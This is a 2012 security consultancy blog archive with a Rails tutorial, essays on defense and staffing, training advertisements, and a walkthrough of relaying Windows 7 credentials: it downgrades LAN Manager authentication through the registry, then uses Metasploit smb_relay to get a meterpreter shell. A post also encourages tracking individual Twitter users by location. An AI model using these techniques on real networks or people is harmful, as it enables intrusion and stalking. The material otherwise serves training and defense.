Monday, December 31, 2012

Basics of Rails Part 5


If you'd like to skip coding this up or are having issues, you can find the application source code here.

To start at the code which represents the completion of Parts 1-5, do the following:

$ git clone git://github.com/cktricky/attackresearch.git

$ cd attackresearch/

$ git reset --hard 3c3003d0b087d64f60446f74bcb2deedca60691f

$ bundle install

$ rake db:create db:migrate unicorn:start[4444]

=========== Part 5 Code and Walkthrough ==============

The first thing we need to do in this post is correct a mistake in the last post.

Type the following to change the model "Users" to it's singular form "User". If you don't, it will cause problems with Rails routing.

$ rails d model Users

$ rails g model User first_name:string last_name:string email:string password_hash:string password_salt:string admin:boolean

$ rake db:drop

$ rake db:create

$ rvmsudo rake db:migrate


Also, a small but important detail, please ensure within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0' 

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'


Now........back to the series. So, we last left off where a login page was visible when browsing to your site but it didn't really do anything.  Time to rectify that.

Within the Sessions controller, a create method was defined and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt method and call it using the "before_save" Rails method. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:

me = User.new
me.email = "test@ar.com"
me.password = "test"
me.password_confirmation = "test"
me.save <~ at this point, any "before_save" methods get called

So when you see something like user = User.new and user.save you know that the encrypt_password method will be called by Rails prior to saving the user data because of the "before_save" definition on line 4.


Now we have to add a few more things:

attr_accessor :password

validates_confirmation_of :password
validates_presence_of :password, :on => :create
validates_presence_of :email
validates_uniqueness_of :email

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception being "attr_accessor", which is a standard Ruby call that allows an object to be both a getter & setter.

Okay, now let's see what it looks like.


Alright, so now we have a login page that does something but we need to create users. For this application's purpose, we are going to allow user's to signup. Let's provide a link for this purpose on the login page and even further, let's create a navigation bar at the top. We want this navigation bar visible on every page visited by the user. Easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (navigation bar, for example).


Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter-Bootstrap, one important thing to note is the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter-Bootstrap defined style.

The logic portion, the portion that belongs to Ruby and Rails, are Lines 13 -18. Effectively we are asking if the user (current_user) visiting the page is authenticated (exists), if they are (do exist), show a link to the logout path. Otherwise, render a login and signup path link.

You are probably wondering where link_to and current_user come from. Rails provides built-in methods and you'll notice, in the views, they are typically placed between <%= and %>. So, link_to is a built in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

Located at /app/controllers/application_controller.rb
Notice on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the view, we have annotated it as a helper_method on line 4.

The next thing we need to do now is actually make the signup page. First, let's modify the attributes that are mass assignable via attr_accessilbe in the user model file.



Next, review the users_controller.rb file and add the methods new & create. When new is called, instantiate a new blank User object (@user). Under the create method, we can modify a new user element leveraging the parameters submitted by the user (email, password, password_confirmation) to create the user. 



Explanation of the Intended Flow - 

  • User clicks "signup" and is sent to /signup (GET request). 
  • User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb. 
  • Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users. 
  • The POST request to /users translates to the "create" action within the "user" controller. 


Now, obviously we are missing something.....we need a signup page! Let's code that up under new.html.erb.


/app/views/users/new.html.erb

The internals of Rails and how we are able to treat @user as an enumerable object and create label tags and text field tags might be a little too complicated for this post. That being said, basically, the @user object (defined in the User controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look like something like user[email] and user[password_confirmation], for example. Here is what the actual request looks like in Burp...


Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so, now we have registered a user. The last piece here is to have a home page to view after successful authentication and also code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path as well as create a destroy method which calls the Rails method "reset_session" and redirects the user back to the root_url. Also, remove the content within the index action under the home controller.

Okay, here is what I mean...

Session Controller - Note changes on Lines 9 and additions on Lines 16-19.

Home Controller - Note that the code contained within the index action has been removed.
You should be able to complete the authentication flow now! Stayed tuned for Part 6.

Note: If you see any security holes in some of the code shown in this series please remember that's kind of the point and refrain from commenting until later.

cktricky

Wednesday, December 12, 2012

Your Soldiers are Untrained


People often try to draw analogies between computer security and the military or warfare. Lets put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?"  And the answer I believe is training, drilling and exercising.  They don't spend the vast majority of their time in heated battle. In fact only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not do they spend most of their time training, exercising and practising for future incidents? If not why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary much like the Airforce Aggressor Squadrons.

From wikipedia: "Aggressor squadrons use enemy tactics, techniques, and procedures to give a realistic simulation of air combat (as opposed to training against one's own forces)." (http://en.wikipedia.org/wiki/Aggressor_squadron)

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits and real attackers do not. Attackers either use 0days, complex configuration/design issues or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best methods to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

 I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc.  This sort of ongoing training is more expensive than penetration testing for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:
Adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to appear like a specific attacker's behaviour such as a beacon which non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive in a cd sized chunk using a non-english language version of winrar and a password captured from an incident response event. The team searches out, identifies and compromises, systems, users and data of interest. Each drill may have a different target such as PCI, engineering related intellectual property, executive communications.

Day 4:

Finally the team ex-filtrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise.  The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc.  Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter if not once a month then your soldiers are untrained and likely to get slaughtered when its time for the real battle.


V.
valsmith

Wednesday, December 5, 2012

On Sophistication


Having played both the attacker and defender role for many years something I have often seen and even done myself is make statements and assumptions about the "sophistication" of my adversary.

Often when some big hack occurs, blogs, media stories and quotes from experts will espouse opinions that "the attacker was not very sophisticated" or "it was an extremely sophisticated attack". I believe that often times, and I myself have been guilty of this, these assertions are the result of a wrong headed analysis and misunderstanding of what sophistication means in the context of computer attacks.

An example will help illustrate the point. I have heard stuxnet labeled both sophisticated and unsophisticated. One might be tempted to point to the inclusion of 4 0days as proving that highly skilled attackers launched this attack. Well 0days can be bought. Others might say; well the way it was caught and the fact that it could infect more than it's presumed target means the attackers weren't very good. Even the most well developed attacks get caught eventually. (See the device the Russians implanted in the Great Seal 60 years ago)

A truly sophisticated attacker will use only what is necessary and cost effective to achieve their goals and no more. An even better attacker will attempt to convince you they are not very good and waste as much of your time as possible while still achieving the goal.

I would put forth the idea that the determination of sophistication be based on the following:

Did the attacker achieve their goals?

Let us assume further that these goals consist of:

1.) Gaining unauthorized access to one or more of your systems

If they achieve #1 then they have already proven to be more sophisticated than your first line of defensive / prevention system as well as your user awareness and training program.To speak of the attacker as unsophisticated because they used an automated SQL injection tool or basic phishing email is silly because you have no idea how good they are based soley on the penetration mechanism and they are already more sophisticated than your ability to stop them.

2.) Evasion of detection, at least for the period of time required to complete some goals

If they have a shell on one of your systems, and nothing detects, alerts or responds, then the attacker is more sophisticated than your SIM implementation, IDS and first line analysts at least from the detection during initial attack standpoint. The fact that they used XOR vs full SSL to protect network communications from detection is irrelevant and gives you no clue as to how good they are.

3.) Access to and/or exfiltration of sensitive data

If the attacker has been able to take the data they are targeting then they have overcome your internal controls, ACLs and data protection. It matters not if they used a zip file or steganography to package the data.

4.) Persistence

If the attacker can persist with unauthorized access on your system for any period of time then they have outsmarted your defensive team, your secure configuration management and basically all your defenses. It doesn't matter if their method of persistence is a simple userland executable launched from the Run key in the registry or a highly stealthy kernel driver, they won that round.

5.) Effect

If they can cause a real world effect such as blowing up your centrifuges, gaining a competitive advantage, or spending your money then that is the final nail in your coffin. They are more sophisticated than you are, regardless of what type of exploit they used, if it was a 10 year old PERL CGI bug or one that uses memory tai chi to elegantly overcome windows 7 buffer overflow protection. 

Lets think about this for a minute. Think of all the money, time, resources and personel you have expended on perimeter defense, detection and alerting, and analytical teams. Think of the work involved at the vendors who have developed all of the products and appliances you have purchased. The PHDs at AV vendors designing heuristics, the smart guys and girls developing exploits and signatures at your favorite IDS company. The awesome hax0rs at the pen test company you just hired. The often millions of dollars spent on defense.

All of this and the attacker has subverted it, maybe with a month of work, maybe less, and considerably less funding in most cases. So who is the sophisticated one?

The only place you might have won is in the forensics post-event department, usually the least funded and most resource starved component of your program. This is usually where the determination is made that the attacker was not very sophisticated because it was possible to reverse engineer the attack and understand the tools and techniques used. That's great but just because you an understand that an assasin used a rock to kill a VIP doesn't mean the assasin sucks if they got away from the highly skilled protection detail, the target is dead, and their identity remains unknown.

So pause for a moment before you label an attacker unsophisticated or a skript kiddie. Ask yourself, did they achieve the above mentioned goas? If so then they outsmarted you.

V.
valsmith

Friday, November 16, 2012

Windows 7 and SMB Relay




Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation.  Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn’t stop you from being able to replay the hash to another host and get a shell – at least, it doesn’t stop you as long as the host isn't speaking NTMLv2! By default, Vista and up send NTMLv2 response only for the LAN Manager authentication level.  This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:




















In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research looking into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key.  This happens on the fly; there are no reboots, logon/logoff's, etc. There is a caveat with this! You have to have administrator privileges on the first host!  This scenario is about tactically exploiting networks and doing this the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.






This registry key is targeting the following path:  HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set to as low as it will go, we can capitalize on this.


Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:






























Once all your settings are selected, exploit and get ready for the hard part.  We need to get this account to attempt authentication to our bounce through the host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\\share).  Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching at the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.

For brevity’s sake, we will just go ahead and simulate this activity by simply typing the following in the run dialogue box on the first victim host:  (192.168.0.14) \\192.168.0.15\share\image.jpg.












I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This attempt of authentication actually happens even by just typing \\192.168.0.15.  With just the IP address entered, you will see authentication attempts to your host, but for large scale attacks, or something along those lines, it is best to have a full UNC path.   Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:
















As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative.  Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.


















This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques is a class based on trying to show people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures.  Offensive Techniques has various sections in it that we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.

The goal of our training is to get you out of the mindset of traditional pen testing and show students how real offensive attacks really happen.  We are hoping these types of concepts spread to the whole industry.  When this happens we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape.  If you are interested in training that we released yesterday or have questions please visit our site or email us at training@attackresearch.com with any questions. 

R.


Anonymous

Thursday, November 15, 2012

Attack Research Training Release


All too often, we at Attack Research have found that students are not being taught, or are not allowed, to properly perform real-world scenarios. For example, they want to run vulnerability scanners on penetration tests! When we say they are not allowed to perform real-world scenarios, some would say it’s the government or the company that doesn't want the real-world scenario. This might be very true, but those governments and companies received the understanding somewhere that running vulnerability scanners on a penetration test was a good idea, and this understanding came through some form of education. Think of network security back in the late 90's to early 2000's: Real-world attacks really did combine scanning for a vulnerability and then exploiting it. Sasser came along and changed the game, and we then had firewalls, improvements in host configurations, etc. In the early 2000's, we started to see what we currently recognize as training in the industry. This training was based upon the attacks in that time period. Well, the evolution of attack has changed, and so has the defense.

Don't get me wrong; the training industry has also evolved, but not at the rate it did when it first started back in the late 90's and 2000's. Back then, there really wasn't a standard for delivering attack-based training. We have certainly had our fair share of standards since then, but when there is no set standard, it is easier to create a new one than it is to change the current one. Well, it’s time to change that!

Classes at Attack Research are designed to help students with real-world problems. We hope to work at a grass roots level and a management level to change the way governments and companies approach network security. This is why our classes are designed to teach technical-level, real-world content. Not only from an offensive perspective but a defensive one as well.  Students will come out of our classes ready to use the skills they learned. They will learn not only how a certain tool is used but the fundamentals behind it so that when they have differing results from the tools, they will know how to handle it or, better yet, they will not use the tool and write their own!

We are proud to announce that Attack Research will be at a number of conferences and locations in 2013. Last week, we announced our partnership with Trail of Bits to offer training in the New York City area in January, April, and June.

Along with our annual training at Black Hat Las Vegas, we have joined with Source Conference to provide training at all their conferences. At Source Boston, we will be offering a 2-day version of our Offensive Techniques training. We will also be at BruCON in September!

Attack Research can transport any of its classes around the world or at your own company. If you are interested in private trainings, please drop us a line at training@attackresearch.com

Starting in 2013, we will hold trainings at Attack Research headquarters in New Mexico, where we will be offering reduced rates for all classes. The majority of our classes will be offered at this location, and they are scheduled to begin January 29-30. We will debut our brand new class, Operational Post Exploitation. You can register for this class here.

Our list of available classes is:

Offensive Techniques – Offensive Techniques offers students the opportunity to learn real offensive cyber-operation techniques. The focus is on recon, target profiling and modeling, and exploitation of trust relationships. The class will teach students non-traditional methods that follow closely what advanced adversaries do, rather than compliance-based penetration testing, and will also teach students how to break into computers without using exploits.

Operational Post-Exploitation – This class explores what to do after a successful penetration into a target, including introducing vulnerabilities rather than back doors for persistence. Operational Post-Exploitation covers such techniques as data acquisition, persistence, stealth, and password management on many different operating systems and using several scenarios.

Rapid Reverse Engineering Rapid Reverse Engineering is a must these days with APT-style attacks and advanced adversaries. This class combines deep reverse engineering subjects with basic rapid triage techniques to provide students with a broad capability when performing malware analysis. This course will take the student from 0 to 60, focusing on learning the tools and key techniques of the trade for rapidly reverse engineering files. Students will understand how to assess rapidly all types of files.

Attacking WindowsAttacking Windows is Attack Research’s unique approach to actually securing Windows. Students will become proficient in attacking Windows systems, learning the commands that are available to help move around systems and data, and examining and employing logging and detection. It will also cover authentication mechanisms, password storage and cracking, tokens, and the domain model. Once finished with this course, students will have a foundation on how attack models on Windows actually happen and how to secure against them.

Attacking UnixAttacking Unix is Attack Research’s unique approach to actually securing Unix. Students will become proficient in attacking Unix systems, focusing mostly on Linux, Solaris and FreeBSD. SSH, Kerberos, kernel modules, file sharing, privilege escalation, home directories, and logging all will be covered in depth. Once finished with this course, students will have a foundation on how attack models on Unix actually happen and how to secure against them.


Web Exploitation — The web is one of the most prevalent vectors of choice when attacking targets because websites reside outside the firewall. Web Exploitation will teach the basics in SQL injection, CGI exploits, content management systems, PHP, asp, and other back doors, as well as the mechanics of exploiting web servers.


MetaPhishingMetaPhishing is a class designed to teach the black arts for targeted phishing operations, file format reverse engineering and infection, and non-attributable command and control systems. Once completing this class, students will have a solid foundation for all situations of phishing.

Basic Exploit Development — In order to use the tools, one must have an understanding of the basics of how they work. Basic Exploit Development will cover the step-by-step basics, tools, and methods for utilizing buffer/heap overflows on Windows and Unix.

Advanced Exploitation - Reliable exploitation on newer Windows systems requires advanced techniques such as heap layout manipulation, return oriented programming, and ASLR information leaks. In addition, robust exploitation necessitates repairing the heap and continuing execution without crashing the process. Advanced Exploitation focuses on teaching the principles behind these advanced techniques and gives the students hands-on experience developing real-world exploits.

This full listing is available on our website as well under the services/training section. Along with each class, there is a place to allow for notification of when the class will be offered next, either at Attack Research HQ or at a different location.

I will be releasing some example modules from some of our classes over the next few weeks so you can get a feel for what we are offering. If you have any questions, please don't hesitate to contact us at training@attackresearch.com




Anonymous

Tuesday, November 6, 2012

Geo-stalking with Bing Maps and the Twitter Maps App


Geo/Social stalking is fun.  Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let's start with somewhere fun, like the pentagon, and see who's tweeting around there


Once you have your places picked out, you can click on the Map Apps tab.



If you click on the twitter maps app, it loads recent geo-tagged tweets


As you zoom in, you get a bit more detail


You can also follow specific users and follow them around town :-)


thanks to indi303 for telling me about this

-CG
CG

Friday, November 2, 2012

Attack Research and Trail Of Bits Partnership



Earlier this week Trail Of Bits announced our partnership with them, offering trainings in New York City. We are very excited to team up with a great company, but also to start delivering practical training in the NYC area. This is the first installment of our new training program that is designed to provide good hands-on knowledge based training that practitioners can use right away.
We debuted our latest class Offensive Techniques at Countermeasure 2012 last week with incredible success. We will be offering Offensive Techniques in January with Trail Of Bits in NYC. In April, we will be releasing our new Rapid Reverse Engineering (RRE) class.  RRE is a practitioner based training that is designed to give reverse engineers techniques that can be used instantly. The class is designed to help get answers from files in a very rapid manner that can be used in instances such as incident response. There will be a technical blog post soon with some example content from Offensive Techniques and Rapid Reverse Engineering. We are very happy to announce this partnership with Trail Of Bits.
We will be releasing a full catalog of our available classes next week! We also offer private trainings of our classes and have the capability to offer classes almost anywhere. If you are interested or have questions email us at training@attackresearch.com
Anonymous

Thursday, November 1, 2012

The Biggest Problem in Computer Security


People tend to focus on various areas as being important for computer security such as memory corruption vulnerabilities, malware, anomaly detection, etc. However the lurking and most critical issue in my opinion is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site we find that we have to have the following skills:

1. Soft skills. (often most important) The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer staff, culture and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore, showing up with a blue mohawk, a spike in the forehead and leather pants, not a team player, cussing and surfing porn on the customers system doesn't cut it no matter how good you are technically. If you are that guy then you get to stay in the lab and I guarantee you will make far less money. Even if you can write ASLR bypass exploits and kernel rootkits.

2. Document. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you cant clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, layed  out so that an executive can understand it and so that the other security firm the customer hires to validate your results doesn't make fun of you.

3.) The ability to mine disparate sets of data. This means taking in apache logs, windows Event logs, proxy logs, full packet captures. Handling, splitting and moving terabytes of data. Writing data mining code in sed/awk/bash/perl/python/ruby. Correlating events, cutting out desired fields, reassembling binary files from packets, etc. Using graphics visualization packages to map out an intruders connections on a network based on netflow data.

4.) Reverse Engineering. This means disassembling binaries in IDA, running binaries in a debugger such as Ollydbg, WinDBG, IDA, memory forensics, and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page check summing? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5.) Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly and another dozen languages, at least well enough to look up APIs, understand standard libraries, discover which imports are important.

6.) Operating systems. You should know the ins and outs including file systems, memory management, kernel, library system and key command line tools of at least half a dozen OS's, especially as they are used in enterprise environments. Domains, NFS, NIS, kerberos, LDAP. So not only windows, linux and OS X, but also solaris, AIX and some embedded or mobile systems.

7.) Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely and test on the customers particular environment. You have to be able to take it apart, analyse the shellcode, understand everything its doing and re-write your own version of it.

8.) Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum enough technical base knowledge to use whatever tool is put in front of you. Examples include wireshark, splunk, fireeye, netwitness, arcsight, tippingpoint, snort / sourcefire, bluecoat, websense, TMI, Encase.

All of the members of your team whether you are a consulting shop or an internal incident response team need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist, they are unicorns. Those who can do this are either already employed, well payed and tackling more interesting problems than you can offer, or they are running/partners in their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and are charging close to high powered lawyer hourly rates. (when people question rates I point out that big name IR shops are around $400/hr and even the BestBuy geek squad charges $120/hr to reload your OS).

A lot of big contractors are trying to approach security like they did IT in the 90s and 00's. Bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a windows server relatively quickly, the above list of skills takes a decade + to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above 1.) Value freedom highly and don't want to work 9 to 5 in a cube farm and 2.) Don't want to live or work long periods of time onsite where you are. They don't want to live in Houston or in Cleaveland or in Indianapolis or probably even in the DC area. They want to live in La Jolla and San Francisco and New York and someone, somewhere is willing to pay them a lot to do it, and probably do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java and that's about it. You might luck out and get a good RIT, Georgia Tech, New Mexico Tech student who knows more but most likely these have already been recruited to the government or somewhere else. And the learning curve time is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city you will fail.

On the security company side you have the same problem, no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels) hire whatever they can find and field them. This continues the trend in mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying out is to focus on buying appliances and contracting pro services to set them up and hope that automation can solve the problem. It cannot. Here is a perfect example. A customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out and at first glance it looked very bad. It had all the classic signs of an exploit, heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular autocad type program generated legitimate PDFs that looked this way. This is something that is not automatible. You must have an experienced and skilled analyst to do this. No amount of rack mount, fancy logo appliances will help you. And the bigger your enterprise the more you need. Every enterprise block of 30 - 50k IPs needs a team of 5 - 10 people.

Which leads me to the next issue. How you perceive your staffing resources. Example: One company I saw told they had a staff of 12 analysts to deal with security detection and response. I thought wow pretty good! Lets break the team down:


  • A manager, full time in meetings, paperwork, etc.
  • An assistant to the manager, secretarial work, etc.
  • 3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts
  • 5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis
  • 1 Developer mostly focused on designing queries and interfaces for the tools.
  • 1 Actual analyst. 

While management believes they have 12 people and doesn't understand why things take so long they actually have 1 person. This situation is very common in big companies. 1 good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security.  What is the solution? Some would say training, but lets be honest, were you back home writing rootkits for work after taking Hoglund and Butler's class at Blackhat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2 day - 1 week course isn't doing it. Going through the entire SANS curriculum isn't doing it and CISSP sure as hell isn't doing it.

You have to spend around 6hrs a day, after work, highly focused on coding, reversing, etc. for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big name researchers and best staff does it,  and unfortunately you only need a couple of attackers for every 10 defenders out there.

V.
valsmith

Tuesday, October 30, 2012

Basics of Rails Part 4


In this portion of the series, we will create the foundation for a login page and deal a little bit more with the Model portion of MVC.

We need to be able to assign the following information to a user.
  • First Name
  • Last Name
  • Email Address
  • Password
  • Admin (true/false)
This is where the Model comes in. Before we jump into that, let's create a Users controller similar to the way we create a Home controller in the last post.

Note that the "new" following Users simply states that a "new" action (method) will be automatically defined in the controller for you. 
Also, we should briefly cover how you connect to a database with Rails. In this tutorial, we will stick with the default configuration/database, SQLite. Navigate to config/database.yml:


If you remember Part 2 of the series, we covered the 3 default modes of Rails. This is the reason there are 3 different database configurations in this file. It is useful as your local development environment database will differ from Production (ex: database username, password, and host would/should be different).

When we are running in development mode, the database we will be using will be db/development.sqlite3 as specified on line 8. The naming convention refers to it's location and filename.

So nothing really to change there, let's go ahead and create the model.


Command(s) Breakdown:
  • rails - Invoking a Rails command
  • g - Short for generate, used to generate Rails items
  • model - specifies that we are generating a model
  • Users - the name of the model which, actually refers to both the model (app/models/users.rb) and a table in the database
  • first_name:string (etc.) - The first portion is the name of the column in the table and the second part (string) identifies the variable type to be stored in the database.
Now, upon generation, the model is created but the db table/columns do not yet exist. To make this happen, let's run rake db:migrate.


To give you a visual of what was just created...

Note the table "users" has been created along with the columns we identified during model creation.
This is great and later if you'd like to add an additional column to your local db, you can. What if you'd like to add a column so that the next person to download your code and run rake db:migrate also has the new column? Navigate to db/migrate/ and you'll see a file that ends in _create_users.rb. This is where you would make that change. Do NOT edit the db/schema.rb file for that purpose (this is overwritten by the migrate files).

Next, create a sessions controller:



Time to add code to the session controller (app/controllers/sessions_controller.rb).



Notice the new and create actions. The gist of this, AFAIK, is that Rails uses new to instantiate a new instance of the Model object and create will actually save data and perform some of the more permanent actions. For our purposes, the "GET" request to the sessions#new and the new.html.erb file will show a login form. Once 'POST'-ing from that login form, the create method will receive the email and password parameters.

Code Breakdown:

Line 6 - Calls a method in the User model (authenticate).
Line 8 - Extract a user ID from the user's session
Line 9 - redirects to a home path once authenticated
Line 11 - A user did not authenticate correctly and we want to send them back to the login page.

The next thing we need to discuss are the changes to your routes.rb file:


Lines 3 - The first portion (ex: logout) identifies a request for that resources, goes to sessions#destroy.
Line 8 - Our root has changed to the login page (app/views/sessions/new.html.erb)
Line 10-12 - We've identified resources (controllers) and instantiated some default routes. 7 to be exact:

You can run `rake routes` to see these.

7 routes automatically created for the actions: index, create, new, edit, show, update, destroy
Note that 7 routes were not manually defined by you, in your routes file but rather, Rails created them for you. This is because you specified `resources :<controller name>` in your routes.rb file. You can create views and controller actions whose names match the names of those 7 defined routes (index, create, etc.). They automagically have routes!


Code breakdown:

Line 5 - form_tag is a Rails method, notice how we encapsulate it in <%= %>. This is how we separate Rails code from regular HTML. You may also see <% %>.
Line 7, 8, 11, 12 - Rails methods that are converted by Rails to define labels and input fields.
Line 14 - submit_tag, again, a Rails method. Note the {:class => "btn btn-primary"}. This is a Twitter-Boostrap definition you can find here.

Now fire up your instance, you should see the following:

Note: You can't necessarily use this yet but it looks nice :-)
This was a lot of information (read: lengthy post) and while the login does not yet work, we will wrap all of this up in Part 5 of the series. While part 5 of this series will walk you through the details of the code, you can always skip ahead and grab it from this Railscast (if you'd like to finish up).

Thanks!




cktricky